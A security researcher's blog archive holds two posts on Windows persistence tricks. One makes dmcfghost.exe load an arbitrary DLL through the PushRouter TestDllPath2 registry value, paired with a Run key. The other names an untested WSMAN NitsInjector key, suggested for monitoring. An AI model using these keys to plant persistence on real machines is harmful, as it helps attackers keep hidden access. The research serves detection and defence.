Category Archives: Anti-Forensics

Beyond good ol’ Run key, Part 91

Posted on by

This is a mixed persistence trick/LOLBIN.

There is a program in the Windows system directory that is very rarely used: dmcfghost.exe. As far as I can tell it has something to do with OMA Client Provisioning (CP) protocol (the internal name of the program states: ‘Host Process for Push Router Client of OMA-CP’).

When you run it, if everything goes as planned (I don’t understand the logic inside the program, but it looks like running it on win 10 always returns success internally), it will load a DLL from the following registry entry:

  • HKLM\SOFTWARE\Microsoft\PushRouter\
    Test\TestDllPath2=<DLL>

So, adding e.g. a Run key pointing to dmcfghost.exe will ensure that this binary is loaded every time user logs on, and the ‘test’ DLL will load as well.

Beyond good ol’ Run key, Part 90

Posted on by

After finding the ‘injection’ trick for Metro Apps I thought I will query the system files for any ‘inject’-ion related strings. This prove to be a fruitful exercise and I found one more possible key that I bet can be used for persistence. I say ‘bet’, because it’s one of the rare occasions in this series when I didn’t manage to successfully test it. It’s really late when I write it and I just found it  + I don’t really fully understand how to test it yet 🙂 More research is needed.

The key is loaded from DscCore.dll that in turn seems to be loaded by the Microsoft.Windows.DSC.CoreConfProviders.dll. The latter seems to be associated with the Desired State Configuration:

  • HKLM\SOFTWARE\Microsoft\
    Windows\CurrentVersion\
    WSMAN\NitsInjector=<DLL>

In any case, worth adding to your monitoring toolkit. If you manage to trigger it please let me know… Thanks!